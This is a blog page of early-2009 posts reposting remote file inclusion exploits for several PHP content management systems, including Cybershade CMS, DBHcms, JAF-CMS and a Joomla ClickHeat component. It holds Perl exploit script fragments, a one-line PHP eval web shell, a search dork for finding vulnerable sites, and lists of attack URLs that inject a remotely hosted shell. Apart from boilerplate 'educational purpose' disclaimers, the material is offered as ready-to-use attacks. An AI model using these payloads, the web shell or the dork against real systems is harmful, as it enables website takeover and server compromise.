Posted by: Bug Dork on: January 18, 2009
#!/usr/bin/perl
####################################################################
# Cybershade CMS 0.2b (index.php) RFI shell_cmd[c99] Exploit
# url: http://sourceforge.net/projects/cybershadecms/
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://www.hack0wn.com
# team: Spanish Hackers Team – [SHT]
#
# Hack0wn Security Project!!
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
####################################################################
#
# “need” register_globals = On
#
# RFI vuln!: [index.php]
# [...]
Posted by: Bug Dork on: January 18, 2009
vul:/include/define.php line 51:
require_once( “$INC_DIR/define_area.php” );
——————————————————
dork:”REALTOR 747 – Version 4.11″
—————————————————–
xpl:
http://127.0.0.1/path/include/define.php?INC_DIR=[shell.txt?]
Posted by: Bug Dork on: January 4, 2009
Vulnerable file
administrator/components/com_clickheat/install.clickheat.php
require_once($GLOBALS['mosConfig_absolute_path'].
‘/administrator/components/com_clickheat/Recly_Config.php’);
administrator/components/com_clickheat/includes/heatmap/_main.php
require_once( $mosConfig_absolute_path .
‘/components/Recly/Clickheat/Clickheat_Heatmap.php’ );
administrator/components/com_clickheat/includes/heatmap/main.php
require_once( $mosConfig_absolute_path .
‘/components/Recly/Clickheat/Clickheat_Heatmap.php’ );
administrator/components/com_clickheat/includes/overview/main.php
require_once( $mosConfig_absolute_path .
‘/components/Recly/Clickheat/Clickheat_Overview.php’ );
administrator/components/com_clickheat/Recly/Clickheat/Cache.php
require_once( $GLOBALS['mosConfig_absolute_path'] .
‘/components/Recly/common/Logger.php’);
administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.ph
p
require_once( $GLOBALS['mosConfig_absolute_path'] .
‘/components/Recly/common/Logger.php’);
administrator/components/com_clickheat/Recly/common/GlobalVariables.php
require_once($GLOBALS['mosConfig_absolute_path'].’/components/Recly/common/
String.php’);
[o] Exploit
http://localhost/[path]/administrator/components/com_clickheat/install.clic
kheat.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
http://localhost/[path]/administrator/components/com_clickheat/includes/hea
tmap/_main.php?mosConfig_absolute_path=[evilcode]
http://localhost/[path]/administrator/components/com_clickheat/includes/hea
tmap/main.php?mosConfig_absolute_path=[evilcode]
http://localhost/[path]/administrator/components/com_clickheat/includes/ove
rview/main.php?mosConfig_absolute_path=[evilcode]
http://localhost/[path]/administrator/components/com_clickheat/Recly/Clickh
eat/Cache.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
http://localhost/[path]/administrator/components/com_clickheat/Recly/Clickh
eat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
http://localhost/[path]/administrator/components/com_clickheat/Recly/common
/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
Posted by: Bug Dork on: January 1, 2009
#!/usr/bin/perl
# DBHcms <= 1.1.4 Remote File Inclusion exploit
# Vendor url: www.drbenhur.com
#
# exploit is hard to execute through a browser -possible though- since it’s with POST
# ~Iron
# http://www.randombase.com
require LWP::UserAgent;
#Shell:
# <?php if(!empty($_GET['do'])){eval($_GET['do']);}?>
$shell_url = “http://localhost/s.txt”;
print “#
# DBHcms <= 1.1.4 Remote File Inclusion exploit
# By Iron – randombase.com
# Greets to everyone at RootShell Security Group
#
# Example target url: http://www.target.com/dhbcms/
Target url?”;
chomp($target=<stdin>);
if($target !~ /^http:\/\//)
{
$target [...]
Posted by: Bug Dork on: January 1, 2009
Script : JAF-CMS 4.0 RC2
Download : SourceForge.net
Method : GET
Critical : High
Impact : System access
http://localhost/path/module/forum/forum.php?website=[SHELL]
http://localhost/path/module/forum/forum.php?main_dir=[SHELL]
http://localhost/path/module/forum/headlines.php?website=[SHELL]
http://localhost/path/module/forum/headlines.php?main_dir=[SHELL]
http://localhost/path/module/forum/main.php?website=[SHELL]
http://localhost/path/module/forum/main.php?main_dir=[SHELL]
milw0rm.com
Komentar Anda